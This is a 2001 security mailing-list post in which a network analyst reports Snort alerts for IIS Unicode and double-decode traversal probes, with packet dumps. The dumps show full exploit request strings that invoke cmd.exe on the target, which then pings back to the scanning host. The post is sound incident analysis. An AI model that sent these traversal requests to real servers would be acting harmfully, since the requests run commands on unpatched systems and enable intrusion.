I have been getting the same type of logs also, but from a different IP. Mainly from China. :-/ Yeah go figure. ./0g ----- Original Message ----- From: "Jason Robertson" <jasonat_private> To: <incidentsat_private> Sent: Sunday, July 29, 2001 1:59 PM Subject: Unusual IIS decode requests > > Hrm.. well I just received something today, well a few days ago.. I just got around to > writing this up. (I must work to hard, doing this on a sunday) > > Anyways, as it looks, this user was attempting to find IIS servers that were > unpatched for the Unicode Bug. But what makes this one unusual is that the > user instead of the common winnt/cmd.exe /c dir c: this user instead used > winnt/cmd.exe /c ping -n 1 -l 128 -w 1, which I find pretty unusual. > > But it does seem to be a smart method of testing, as this does elimate some of > the overhead, that the dir c: could timeout, if and only if someone would put a large > number of files in c:\, and to really be annoying put a large number of 0byte files in > C:\, this could give you a large number of files, with very low number of wasted > space(though it still is a waste of space because of the name, time, acl entries) > but what can you do > > > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:13pm 24.41.72.83:1712 -> 216.18.61.203:80 > TTL: 47 TOS: 0x224 ID:0 > ***AP**F Seq: 672966764 Ack: 2100864331 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:13pm 24.41.72.83:1714 -> 216.18.61.202:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 680331733 Ack: 2100928858 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:13pm 24.41.72.83:1715 -> 216.18.61.201:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 684366937 Ack: 2101034143 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:16pm 24.41.72.83:1711 -> 216.18.61.205:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 676101846 Ack: 2101820142 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS multiple decode attempt [**] > Jul 27,01 12:37:22pm 24.41.72.83:1946 -> 216.18.61.205:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP*** Seq: 676258451 Ack: 2106779224 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 2535632E2E25356377696E6E742F73797374656D %5c..%5cwinnt/system > 33322F636D642E6578653F2F632B70696E672B2D 32/cmd.exe?/c+ping+- > 6E2B312B2D6C2B3132382B2D772B312B32342E34 n+1+-l+128+-w+1+24.4 > 312E37322E383320485454502F312E300A0A0000 1.72.83.HTTP/1.0.... > 3C85034038700140CF0700006ECD004020990408 <..@8p.@....n..@.... > 446A0140C04812401ECE00408C71014098720140 Dj.@.H.@...@.q.@.r.@ > 2C99040801000000F28204086E43124020990408 ,...........nC.@.... > 446A0140C04812400100000060431240006B0140 Dj.@.H.@....`C.@.k.@ > 10F6FFBFA185040820990408009A0408 ................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:25pm 24.41.72.83:1701 -> 216.18.61.216:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 672736508 Ack: 2100687070 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:37:28pm 24.41.72.83:2151 -> 216.18.61.207:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 690117489 Ack: 2106691395 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > [**] WEB-IIS multiple decode attempt [**] > Jul 27,01 12:37:55pm 24.41.72.83:1709 -> 216.18.61.206:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP*** Seq: 679791880 Ack: 2118977419 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 2535632E2E25356377696E6E742F73797374656D %5c..%5cwinnt/system > 33322F636D642E6578653F2F632B70696E672B2D 32/cmd.exe?/c+ping+- > 6E2B312B2D6C2B3132382B2D772B312B32342E34 n+1+-l+128+-w+1+24.4 > 312E37322E383320485454502F312E300A0A0000 1.72.83.HTTP/1.0.... > 3C85034038700140CF0700006ECD004020990408 <..@8p.@....n..@.... > 446A0140C04812401ECE00408C71014098720140 Dj.@.H.@...@.q.@.r.@ > 2C99040801000000F28204086E43124020990408 ,...........nC.@.... > 446A0140C04812400100000060431240006B0140 Dj.@.H.@....`C.@.k.@ > 10F6FFBFA185040820990408009A0408 ................ > > [**] WEB-IIS cmd.exe access [**] > Jul 27,01 12:40:20pm 24.41.72.83:1843 -> 216.18.61.201:80 > TTL: 47 TOS: 0x0 ID:0 > ***AP**F Seq: 686495535 Ack: 2105591950 Win: 5840 > > 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/.. > 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy > 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi > 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+ > 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0 > 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@ > 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@ > 987201402C99040801000000F28204086E431240 .r.@,...........nC.@ > 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@ > 006B014010F6FFBFA185040820990408009A0408 .k.@................ > > > ------- End of forwarded message ------- > > --- > Jason Robertson > Network Analyst > jasonat_private > http://www.astroadvice.com > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Jul 30 2001 - 11:00:27 PDT